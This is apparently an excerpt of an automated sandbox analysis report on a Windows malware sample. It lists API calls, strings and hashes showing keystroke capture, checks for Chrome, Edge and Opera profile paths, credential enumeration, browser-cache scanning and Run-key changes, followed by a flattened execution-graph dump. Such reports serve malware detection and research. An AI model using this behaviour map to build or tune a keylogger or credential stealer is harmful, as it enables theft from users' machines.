                                      • API String ID: 1623830855-1496645233

                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx$PkGNG
                                      • API String ID: 2568140703-1065776982

                                      APIs
                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                      Similarity
                                      • API ID: wave$BufferHeaderPrepare
                                      • String ID: XMG
                                      • API String ID: 2315374483-813777761

                                      APIs
                                      • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                      Similarity
                                      • API ID: LocaleValid
                                      • String ID: IsValidLocaleName$JD
                                      • API String ID: 1901932003-2234456777

                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398

                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040

                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700

                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 0040B64B
                                        • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                        • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                        • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                        • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                        • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                      Similarity
                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 2738857842-2658077756
                                      • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                      • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                      • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                      • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                      • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: uD
                                      • API String ID: 0-2547262877
                                      • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                      • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                      • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                      • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem
                                      • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                      • API String ID: 2086374402-949981407
                                      • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                      • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                      • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                      • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: !D@$open
                                      • API String ID: 587946157-1586967515
                                      • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                      • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                      • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                      • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ___initconout.LIBCMT ref: 0045555B
                                        • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                      • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConsoleCreateFileWrite___initconout
                                      • String ID: PkGNG
                                      • API String ID: 3087715906-263838557
                                      • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                      • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                      • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                      • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 0040B6A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                      • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                      • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                      • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      • __Init_thread_footer.LIBCMT ref: 00410F29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: ,kG$0kG
                                      • API String ID: 1881088180-2015055088
                                      • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                      • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                      • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                      • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                      • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                      • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                      • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                      • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandLine
                                      • String ID: 83
                                      • API String ID: 3253501508-3252599246
                                      • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                      • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                      • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                      • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                      • GetLastError.KERNEL32 ref: 00440D35
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                      • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                      • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                      • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                      • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                      • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                      • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                      • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                      • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                      • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage: 6.5%
                                      Dynamic/Decrypted Code Coverage: 9.2%
                                      Signature Coverage: 0%
                                      Total number of Nodes: 2000
                                      Total number of Limit Nodes: 111
                                      execution_graph: flattened node and edge dump of the execution graph (node addresses such as 441819, 4466f4 and 41276d, each followed by the API names called at that node, with edges written as A->B). The rendered graph did not survive extraction; the coverage figures above are the recoverable summary.
38508->38814 38519 445ef5 38509->38519 38511 4457c7 38511->38465 38513 4087b3 338 API calls 38511->38513 38512 40ae51 9 API calls 38512->38519 38513->38465 38514 445f5c 38516 40aebe FindClose 38514->38516 38515 40add4 2 API calls 38515->38519 38516->38475 38517 40b2cc 27 API calls 38517->38519 38518 409d1f 6 API calls 38518->38519 38519->38512 38519->38514 38519->38515 38519->38517 38519->38518 38521 445f3a 38519->38521 38920 409b98 GetFileAttributesW 38519->38920 38921 445093 23 API calls 38521->38921 38523->38322 38524->38324 38525->38322 38526->38317 38528 40c775 38527->38528 38923 40b1ab ??3@YAXPAX ??3@YAXPAX 38528->38923 38530 40c788 38924 40b1ab ??3@YAXPAX ??3@YAXPAX 38530->38924 38532 40c790 38925 40b1ab ??3@YAXPAX ??3@YAXPAX 38532->38925 38534 40c798 38535 40aa04 ??3@YAXPAX 38534->38535 38536 40c7a0 38535->38536 38926 40c274 memset 38536->38926 38541 40a8ab 9 API calls 38542 40c7c3 38541->38542 38543 40a8ab 9 API calls 38542->38543 38544 40c7d0 38543->38544 38955 40c3c3 38544->38955 38548 40c877 38557 40bdb0 38548->38557 38549 40c86c 38997 4053fe 39 API calls 38549->38997 38551 40c7e5 38551->38548 38551->38549 38556 40c634 49 API calls 38551->38556 38980 40a706 38551->38980 38556->38551 39165 404363 38557->39165 38560 40bf5d 39185 40440c 38560->39185 38562 40bdee 38562->38560 38565 40b2cc 27 API calls 38562->38565 38563 40bddf CredEnumerateW 38563->38562 38566 40be02 wcslen 38565->38566 38566->38560 38568 40be1e 38566->38568 38567 40be26 _wcsncoll 38567->38568 38568->38560 38568->38567 38571 40be7d memset 38568->38571 38572 40bea7 memcpy 38568->38572 38573 40bf11 wcschr 38568->38573 38574 40b2cc 27 API calls 38568->38574 38576 40bf43 LocalFree 38568->38576 39188 40bd5d 28 API calls 38568->39188 39189 404423 38568->39189 38571->38568 38571->38572 38572->38568 38572->38573 38573->38568 38575 40bef6 _wcsnicmp 38574->38575 38575->38568 38575->38573 38576->38568 38577 4135f7 39202 4135e0 38577->39202 38580 40b2cc 27 API calls 38581 41360d 38580->38581 38582 
40a804 8 API calls 38581->38582 38583 413613 38582->38583 38584 41361b 38583->38584 38585 41363e 38583->38585 38586 40b273 27 API calls 38584->38586 38587 4135e0 FreeLibrary 38585->38587 38588 413625 GetProcAddress 38586->38588 38589 413643 38587->38589 38588->38585 38590 413648 38588->38590 38589->38355 38591 413658 38590->38591 38592 4135e0 FreeLibrary 38590->38592 38591->38355 38593 413666 38592->38593 38593->38355 39205 4449b9 38594->39205 38597 444c1f 38597->38332 38598 4449b9 42 API calls 38611 40399d 38610->38611 39231 403a16 38611->39231 38613 403a09 39245 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->39245 38615 403a12 wcsrchr 38615->38347 38616 4039a3 38616->38613 38619 4039f4 38616->38619 39242 40a02c CreateFileW 38616->39242 38619->38613 38620 4099c6 2 API calls 38619->38620 38620->38613 38622 414c2e 16 API calls 38621->38622 38623 404048 38622->38623 38624 414c2e 16 API calls 38623->38624 38625 404056 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 404073 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 40408e 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 4040a6 38630->38631 38632 403af5 20 API calls 38631->38632 38633 4040ba 38632->38633 38634 403af5 20 API calls 38633->38634 38635 4040cb 38634->38635 39272 40414f memset 38635->39272 38637 404140 39286 40b1ab ??3@YAXPAX ??3@YAXPAX 38637->39286 38639 4040ec memset 38642 4040e0 38639->38642 38640 404148 38640->38403 38641 4099c6 2 API calls 38641->38642 38642->38637 38642->38639 38642->38641 38643 40a8ab 9 API calls 38642->38643 38643->38642 39299 40a6e6 WideCharToMultiByte 38644->39299 38646 4087ed 39300 4095d9 memset 38646->39300 38649 408953 38649->38403 38650 408809 memset memset memset memset memset 38651 40b2cc 27 API calls 38650->38651 38652 4088a1 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 4088b1 38653->38654 38655 40b2cc 27 API calls 38654->38655 38696 40b633 ??3@YAXPAX 38695->38696 38697 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38696->38697 38698 
413f00 Process32NextW 38697->38698 38699 413da5 OpenProcess 38698->38699 38700 413f17 CloseHandle 38698->38700 38701 413df3 memset 38699->38701 38706 413eb0 38699->38706 38700->38441 39589 413f27 38701->39589 38703 413ebf ??3@YAXPAX 38703->38706 38704 4099f4 3 API calls 38704->38706 38706->38698 38706->38703 38706->38704 38707 413e37 GetModuleHandleW 38708 413e1f 38707->38708 38709 413e46 GetProcAddress 38707->38709 38708->38707 39594 413959 38708->39594 39610 413ca4 38708->39610 38709->38708 38711 413ea2 CloseHandle 38711->38706 38713 414c2e 16 API calls 38712->38713 38714 403eb7 38713->38714 38715 414c2e 16 API calls 38714->38715 38716 403ec5 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403ee2 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 403efd 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 403f15 38721->38722 38723 403af5 20 API calls 38722->38723 38724 403f29 38723->38724 38725 403af5 20 API calls 38724->38725 38726 403f3a 38725->38726 38727 40414f 33 API calls 38726->38727 38728 403f4f 38727->38728 38729 403faf 38728->38729 38731 403f5b memset 38728->38731 38733 4099c6 2 API calls 38728->38733 38734 40a8ab 9 API calls 38728->38734 39624 40b1ab ??3@YAXPAX ??3@YAXPAX 38729->39624 38731->38728 38732 403fb7 38732->38387 38733->38728 38734->38728 38736 414c2e 16 API calls 38735->38736 38737 403d26 38736->38737 38738 414c2e 16 API calls 38737->38738 38739 403d34 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d51 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403d6c 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403d84 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403d98 38746->38747 38748 403af5 20 API calls 38747->38748 38749 403da9 38748->38749 38750 40414f 33 API calls 38749->38750 38751 403dbe 38750->38751 38752 403e1e 38751->38752 38753 403dca memset 38751->38753 38756 4099c6 2 API calls 38751->38756 38757 40a8ab 9 API calls 38751->38757 39625 40b1ab ??3@YAXPAX ??3@YAXPAX 
38752->39625 38753->38751 38755 403e26 38755->38391 38756->38751 38757->38751 38759 414b81 9 API calls 38758->38759 38760 414c40 38759->38760 38761 414c73 memset 38760->38761 39626 409cea 38760->39626 38762 414c94 38761->38762 39629 414592 RegOpenKeyExW 38762->39629 38765 414c64 38765->38381 38767 414cc1 38768 414cf4 wcscpy 38767->38768 39630 414bb0 wcscpy 38767->39630 38768->38765 38770 414cd2 39631 4145ac RegQueryValueExW 38770->39631 38772 414ce9 RegCloseKey 38772->38768 38774 409d62 38773->38774 38775 409d43 wcscpy 38773->38775 38774->38423 38776 409719 2 API calls 38775->38776 38777 409d51 wcscat 38776->38777 38777->38774 38779 40aebe FindClose 38778->38779 38780 40ae21 38779->38780 38781 4099c6 2 API calls 38780->38781 38782 40ae35 38781->38782 38783 409d1f 6 API calls 38782->38783 38784 40ae49 38783->38784 38784->38458 38786 40ade0 38785->38786 38787 40ae0f 38785->38787 38786->38787 38788 40ade7 wcscmp 38786->38788 38787->38458 38788->38787 38789 40adfe wcscmp 38788->38789 38789->38787 38791 40ae18 9 API calls 38790->38791 38797 4453c4 38791->38797 38792 40ae51 9 API calls 38792->38797 38793 4453f3 38795 40aebe FindClose 38793->38795 38794 40add4 2 API calls 38794->38797 38796 4453fe 38795->38796 38796->38458 38797->38792 38797->38793 38797->38794 38798 445403 253 API calls 38797->38798 38798->38797 38800 40ae7b FindNextFileW 38799->38800 38801 40ae5c FindFirstFileW 38799->38801 38802 40ae94 38800->38802 38803 40ae8f 38800->38803 38801->38802 38805 40aeb6 38802->38805 38806 409d1f 6 API calls 38802->38806 38804 40aebe FindClose 38803->38804 38804->38802 38805->38458 38806->38805 38807->38390 38808->38444 38809->38425 38810->38425 38811->38459 38813 409c89 38812->38813 38813->38481 38814->38511 38816 413d39 38815->38816 38817 413d2f FreeLibrary 38815->38817 38818 40b633 ??3@YAXPAX 38816->38818 38817->38816 38819 413d42 38818->38819 38820 40b633 ??3@YAXPAX 38819->38820 38821 413d4a 38820->38821 38821->38340 38822->38344 38823->38393 38824->38407 38826 44db70 
38825->38826 38827 40b6fc memset 38826->38827 38828 409c70 2 API calls 38827->38828 38829 40b732 wcsrchr 38828->38829 38830 40b743 38829->38830 38831 40b746 memset 38829->38831 38830->38831 38832 40b2cc 27 API calls 38831->38832 38833 40b76f 38832->38833 38834 409d1f 6 API calls 38833->38834 38835 40b783 38834->38835 39632 409b98 GetFileAttributesW 38835->39632 38837 40b792 38838 40b7c2 38837->38838 38839 409c70 2 API calls 38837->38839 39633 40bb98 38838->39633 38841 40b7a5 38839->38841 38843 40b2cc 27 API calls 38841->38843 38847 40b7b2 38843->38847 38844 40b837 FindCloseChangeNotification 38846 40b83e memset 38844->38846 38845 40b817 39667 409a45 GetTempPathW 38845->39667 39666 40a6e6 WideCharToMultiByte 38846->39666 38850 409d1f 6 API calls 38847->38850 38850->38838 38851 40b827 CopyFileW 38851->38846 38852 40b866 38853 444432 121 API calls 38852->38853 38854 40b879 38853->38854 38855 40bad5 38854->38855 38856 40b273 27 API calls 38854->38856 38857 40baeb 38855->38857 38858 40bade DeleteFileW 38855->38858 38859 40b89a 38856->38859 38860 40b04b ??3@YAXPAX 38857->38860 38858->38857 38861 438552 134 API calls 38859->38861 38862 40baf3 38860->38862 38863 40b8a4 38861->38863 38862->38417 38864 40bacd 38863->38864 38866 4251c4 137 API calls 38863->38866 38865 443d90 111 API calls 38864->38865 38865->38855 38889 40b8b8 38866->38889 38867 40bac6 39679 424f26 123 API calls 38867->39679 38868 40b8bd memset 39670 425413 17 API calls 38868->39670 38871 425413 17 API calls 38871->38889 38874 40a71b MultiByteToWideChar 38874->38889 38875 40a734 MultiByteToWideChar 38875->38889 38878 40b9b5 memcmp 38878->38889 38879 4099c6 2 API calls 38879->38889 38880 404423 37 API calls 38880->38889 38882 40bb3e memset memcpy 39680 40a734 MultiByteToWideChar 38882->39680 38883 4251c4 137 API calls 38883->38889 38886 40bb88 LocalFree 38886->38889 38889->38867 38889->38868 38889->38871 38889->38874 38889->38875 38889->38878 38889->38879 38889->38880 38889->38882 38889->38883 38890 40ba5f 
memcmp 38889->38890 39671 4253ef 16 API calls 38889->39671 39672 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38889->39672 39673 4253af 17 API calls 38889->39673 39674 4253cf 17 API calls 38889->39674 39675 447280 memset 38889->39675 39676 447960 memset memcpy memcpy memcpy 38889->39676 39677 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38889->39677 39678 447920 memcpy memcpy memcpy 38889->39678 38890->38889 38891->38419 38893 40aed1 38892->38893 38894 40aec7 FindClose 38892->38894 38893->38352 38894->38893 38896 4099d7 38895->38896 38897 4099da memcpy 38895->38897 38896->38897 38897->38402 38899 40b2cc 27 API calls 38898->38899 38900 44543f 38899->38900 38901 409d1f 6 API calls 38900->38901 38902 44544f 38901->38902 39772 409b98 GetFileAttributesW 38902->39772 38904 44545e 38905 445476 38904->38905 38906 40b6ef 252 API calls 38904->38906 38907 40b2cc 27 API calls 38905->38907 38906->38905 38908 445482 38907->38908 38909 409d1f 6 API calls 38908->38909 38910 445492 38909->38910 39773 409b98 GetFileAttributesW 38910->39773 38912 4454a1 38913 4454b9 38912->38913 38914 40b6ef 252 API calls 38912->38914 38913->38433 38914->38913 38915->38432 38916->38449 38917->38455 38918->38492 38919->38474 38920->38519 38921->38519 38922->38502 38923->38530 38924->38532 38925->38534 38927 414c2e 16 API calls 38926->38927 38928 40c2ae 38927->38928 38998 40c1d3 38928->38998 38933 40c3be 38950 40a8ab 38933->38950 38934 40afcf 2 API calls 38935 40c2fd FindFirstUrlCacheEntryW 38934->38935 38936 40c3b6 38935->38936 38937 40c31e wcschr 38935->38937 38938 40b04b ??3@YAXPAX 38936->38938 38939 40c331 38937->38939 38940 40c35e FindNextUrlCacheEntryW 38937->38940 38938->38933 38941 40a8ab 9 API calls 38939->38941 38940->38937 38942 40c373 GetLastError 38940->38942 38945 40c33e wcschr 38941->38945 38943 40c3ad FindCloseUrlCache 38942->38943 38944 40c37e 38942->38944 38943->38936 38946 40afcf 2 API calls 38944->38946 38945->38940 38947 40c34f 38945->38947 38948 40c391 FindNextUrlCacheEntryW 
38946->38948 38949 40a8ab 9 API calls 38947->38949 38948->38937 38948->38943 38949->38940 39092 40a97a 38950->39092 38953 40a8cc 38953->38541 38954 40a8d0 7 API calls 38954->38953 39097 40b1ab ??3@YAXPAX ??3@YAXPAX 38955->39097 38957 40c3dd 38958 40b2cc 27 API calls 38957->38958 38959 40c3e7 38958->38959 39098 414592 RegOpenKeyExW 38959->39098 38961 40c3f4 38962 40c50e 38961->38962 38963 40c3ff 38961->38963 38977 405337 38962->38977 38964 40a9ce 4 API calls 38963->38964 38965 40c418 memset 38964->38965 39099 40aa1d 38965->39099 38968 40c471 38970 40c47a _wcsupr 38968->38970 38969 40c505 RegCloseKey 38969->38962 38971 40a8d0 7 API calls 38970->38971 38972 40c498 38971->38972 38973 40a8d0 7 API calls 38972->38973 38974 40c4ac memset 38973->38974 38975 40aa1d 38974->38975 38976 40c4e4 RegEnumValueW 38975->38976 38976->38969 38976->38970 39101 405220 38977->39101 38981 4099c6 2 API calls 38980->38981 38982 40a714 _wcslwr 38981->38982 38983 40c634 38982->38983 39158 405361 38983->39158 38986 40c65c wcslen 39161 4053b6 39 API calls 38986->39161 38987 40c71d wcslen 38987->38551 38989 40c713 39164 4053df 39 API calls 38989->39164 38990 40c677 38990->38989 39162 40538b 39 API calls 38990->39162 38993 40c6a5 38993->38989 38994 40c6a9 memset 38993->38994 38995 40c6d3 38994->38995 39163 40c589 43 API calls 38995->39163 38997->38548 38999 40ae18 9 API calls 38998->38999 39005 40c210 38999->39005 39000 40ae51 9 API calls 39000->39005 39001 40c264 39002 40aebe FindClose 39001->39002 39004 40c26f 39002->39004 39003 40add4 2 API calls 39003->39005 39010 40e5ed memset memset 39004->39010 39005->39000 39005->39001 39005->39003 39006 40c231 _wcsicmp 39005->39006 39007 40c1d3 35 API calls 39005->39007 39006->39005 39008 40c248 39006->39008 39007->39005 39023 40c084 22 API calls 39008->39023 39011 414c2e 16 API calls 39010->39011 39012 40e63f 